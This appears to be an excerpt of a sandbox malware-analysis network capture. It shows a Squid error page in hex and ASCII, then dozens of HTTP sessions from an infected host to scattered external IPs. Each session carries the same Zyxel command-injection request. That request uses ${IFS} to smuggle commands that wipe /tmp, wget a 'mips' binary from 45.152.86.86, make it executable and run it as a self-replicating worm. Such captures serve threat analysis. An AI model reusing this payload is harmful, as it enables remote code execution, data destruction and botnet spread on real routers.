73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2023 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2023 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;fon


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8747192.168.2.2347520164.248.191.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:38.794178009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8748192.168.2.2339846154.51.41.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:38.794229984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8749192.168.2.2350338102.59.177.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:38.794277906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8750192.168.2.2340138158.253.61.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:38.794336081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8751192.168.2.2338604115.250.230.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:38.794397116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8752192.168.2.234120883.104.74.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:38.794439077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8753192.168.2.233918219.149.234.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:38.794698954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8754192.168.2.2351788101.142.128.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:38.794745922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8755192.168.2.23368361.172.180.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.816760063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8756192.168.2.2355714113.192.130.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.816801071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8757192.168.2.2339762157.23.167.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.816844940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8758192.168.2.2344332158.196.148.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.816905975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8759192.168.2.2340090155.45.219.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.816951990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8760192.168.2.2340208150.177.172.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.816988945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8761192.168.2.2334112162.225.191.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817043066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8762192.168.2.2352366212.178.157.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817075968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8763192.168.2.2354454105.73.202.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817126989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8764192.168.2.2335512147.89.89.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817164898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8765192.168.2.234275476.17.40.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817219019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8766192.168.2.2356704115.252.10.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817264080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8767192.168.2.2352586186.1.10.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817298889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8768192.168.2.2352062105.20.198.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817337036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8769192.168.2.233835654.127.121.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817418098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8770192.168.2.234814440.181.122.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817457914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8771192.168.2.2354114146.69.167.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817497969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8772192.168.2.2355118121.15.73.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817548990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8773192.168.2.2354652101.81.92.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817593098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8774192.168.2.234330220.135.47.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817636967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8775192.168.2.2345176134.193.41.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817687035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8776192.168.2.233427620.31.186.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817733049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8777192.168.2.235850045.170.97.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817769051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8778192.168.2.2349870132.49.120.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817820072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8779192.168.2.235546061.86.209.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817858934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8780192.168.2.235040872.255.64.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817919970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8781192.168.2.235528242.23.116.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.817965031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8782192.168.2.2338052152.187.174.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818018913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8783192.168.2.234383298.34.200.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818063021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8784192.168.2.236034099.134.104.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818094969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8785192.168.2.2352580184.21.228.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818155050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8786192.168.2.2345912193.233.91.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818201065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8787192.168.2.2340260196.41.234.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818238974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8788192.168.2.2340246223.81.121.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818280935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8789192.168.2.2353708136.118.157.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818341017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8790192.168.2.2344732156.104.76.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818380117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8791192.168.2.234574641.110.219.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818427086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8792192.168.2.2334874217.243.9.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818480015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8793192.168.2.2350068139.173.18.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818525076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8794192.168.2.2336168153.38.124.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818569899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8795192.168.2.234470057.84.246.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818617105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8796192.168.2.2359190169.242.194.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818660975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8797192.168.2.235099689.79.128.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818686962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8798192.168.2.2342062189.67.37.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818736076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8799192.168.2.2345360211.4.72.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818769932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8800192.168.2.2340958194.240.212.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818809032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8801192.168.2.234784478.217.113.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818865061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8802192.168.2.2352962170.50.33.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818913937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8803192.168.2.23481081.107.58.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.818962097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8804192.168.2.2338898195.239.152.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819009066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8805192.168.2.2345058194.90.42.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819041967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8806192.168.2.233360669.250.233.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819076061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8807192.168.2.2348056137.121.175.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819124937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8808192.168.2.233425872.221.117.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819166899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8809192.168.2.234646695.70.146.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819224119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8810192.168.2.2345912134.136.237.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819272041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8811192.168.2.2347374108.251.7.17443
                                        TimestampBytes transferredDirectionData
